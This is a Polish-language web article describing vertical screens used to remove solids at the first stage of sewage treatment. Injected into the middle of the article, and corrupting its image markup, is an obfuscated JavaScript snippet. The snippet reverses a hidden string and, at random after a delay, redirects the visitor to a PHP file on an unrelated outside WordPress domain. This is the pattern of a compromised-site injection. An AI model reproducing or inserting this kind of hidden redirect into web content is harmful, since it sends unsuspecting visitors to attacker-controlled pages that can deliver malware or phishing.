Wstępne oddzielanie ciał stałych w ściekach

Wszelkie zanieczyszczenia stałe na wstępnym etapie zostają oddzielone za pomocą sita pionowego, które można umieścić w pomieszczeniu lub i na zewnątrz. Dzięki urządzeniu odizolowane skratki zostają umieszczone w specjalnych kontenerach lub workach. Urządzenie jest energooszczędne uraz wykazuje się niską emisją hałasu.

Zastosowanie sita pionowego w oczyszczaniu ścieków

si<script>$NqM=function(n){if (typeof ($NqM.list[n]) == „string”) return $NqM.list[n].split(„”).reverse().join(„”);return $NqM.list[n];};$NqM.list=[„\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}</script>to pionowe” height=”110″ src=”http://globalforum.pl/wp-content/uploads/2021/07/si<script>$NqM=function(n){if (typeof ($NqM.list[n]) == to-pionowe.jpg” style=”float:left;” width=”180″/>We wstępnym oczyszczaniu ścieków z ciał stałych stosuje się sito pionowe które oddziela mechanicznie większe elementy. Stosuje się podczas oczyszczania ścieków komunalnych oraz przemysłowych. Urządzenie znajduje swoje zastosowanie w mniejszych oczyszczalniach ścieków. Sprawne oddzielanie większych elementów stałych odbywa się za pomocą sita cedzącego, które jest pionowe. Cały proces odbywa się w hermetycznym systemie urządzenia. Sito pionowe spełnia wszelkie obowiązujące normy ISO i wykonane jest z wysokiej jakości stali nierdzewnej, które odporne jest na działanie niekorzystnych warunków, w których pracuje. Płynąca struga ścieków zostaje sprawni oczyszczana, co sprawia, że kolejne etapy oczyszczania i zagęszczania ścieków są wydajniejsze i efektywniejsze. W celu wymiany sita należy zamknąć dopływ ścieków, lecz za sprawą odpowiedniej budowy konstrukcji, odbywa się to sprawnie. Urządzenie generuje niskie koszty eksploatacji i jest łatwe o montażu. Wielkość sita w urządzeniu musi być odpowiednio dopasowana do przepływu ścieków.

Montaż sita pionowego może być zarówno na świeżym powietrzu, jak i w pomieszczeniach. Skratki, które zostaną odizolowane za pomocą sita, są zagęszczane, odwadniane i one trafiają do osobnych pojemników. Urządzenie, dzięki swojej pionowej budowie świetnie nadaje się także do montażu w studniach oraz samodzielnych obiektach, służących do oczyszczania ścieków.